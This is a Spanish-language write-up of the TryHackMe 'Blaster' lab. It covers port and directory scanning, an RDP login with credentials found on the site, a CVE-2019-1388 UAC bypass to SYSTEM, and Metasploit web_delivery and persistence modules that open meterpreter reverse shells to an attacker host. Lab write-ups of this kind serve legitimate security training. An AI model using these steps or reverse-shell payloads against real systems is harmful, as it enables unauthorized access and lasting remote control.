Este artículo detalla un ejercicio práctico de pruebas de penetración en la máquina virtual "Blaster" alojada en TryHackMe. El objetivo es obtener acceso inicial y elevar privilegios en un sistema Windows.
Despliegue del Objetivo
Se debe activar la máquina virtual a través de la interfaz del laboratorio en TryHackMe. Tenga en cuenta que el sistema operativo objetivo es Windows y puede tomar varios minutos en estar disponible.
Obtención de Acceso Inicial
Análisis de Puertos
Realice un escaneo de puertos en la dirección IP del objetivo usando la herramienta nmap:
nmap -sV -Pn -p- --min-rate=5000 10.10.50.20
Los resultados muestran dos puertos abiertos: 80/tcp y 3389/tcp.
Exploración de Directorios
Utilice gobuster para buscar directorios ocultos en el servidor web:
gobuster dir -u http://10.10.50.20/ -w /usr/share/wordlists/dirb/common.txt -t 50
Se descubre el directorio /retro.
Descubrimiento de Información Sensible
Al visitar el directorio oculto, se identifica un posible nombre de usuario: "Wade". Navegando por el sitio, en la sección de comentarios se encuentra una contraseña candidata: "parzival".
Inicio de Sesión por RDP
Dado que el puerto 3389 está abierto (servicio de Escritorio Remoto), se utilizan las credenciales obtenidas para iniciar sesión con xfreerdp:
xfreerdp /u:Wade /p:parzival /v:10.10.50.20 /dynamic-resolution +clipboard
Dentro de la sesión de usuario, se localiza y lee el archivo user.txt en el escritorio, cuyo contenido es una bandera de captura.
Elevación de Privilegios
Tras acceder por RDP, se revisa el historial del navegador y se encuentra que el usuario investigó la vulnerabilidad CVE-2019-1388. En la papelera de reciclaje se localiza un ejecutable necesario para la explotación: hhupd.exe.
Explotación de CVE-2019-1388
Para elevar privilegios, se ejecuta hhupd.exe como administrador. Se sigue el procedimiento para bypass de UAC:
- Hacer clic en "show more" y luego en "show information about the publisher's certificate".
- Seleccionar el enlace "VeriSign Commercial Software Publishers CA.".
- En el navegador Internet Explorer abierto, ir a Configuración > Archivo > Guardar como.
- En el cuadro de nombre de archivo, ingresar
C:\Windows\System32y presionar Enter. - Navegar hasta
cmd.exey ejecutarlo.
En la nueva consola, el comando whoami confirma que se ha obtenido acceso como nt authority\system. Se lee el archivo root.txt en el escritorio del administrador.
Fase Post-Explotcaión
Para mantener persistencia, se utiliza Metasploit Framework. Primero, se inicia la consola de Metasploit:
msfconsole -q
Se selecciona el módulo para entrega web:
use exploit/multi/script/web_delivery
Se configuran los parámetros necesarios:
set LHOST 192.168.1.100
set target 2
set payload windows/meterpreter/reverse_http
run -j
El comando generado por Metasploit se copia y ejecuta en la consola del objetivo (a través de la sesión RDP). Esto genera una sesión de Meterpreter en el atacante.
Para lograr persistencia, se utiliza el módulo local de persistencia. Se envía la sesión actual a segundo plano con bg y luego:
use exploit/windows/local/persistence
set session 1
set LHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
run
Finalmente, se configura un manejador para escuchar conexiones entrantes y recuperar la sesión cuando el sistema objetivo se reinicie.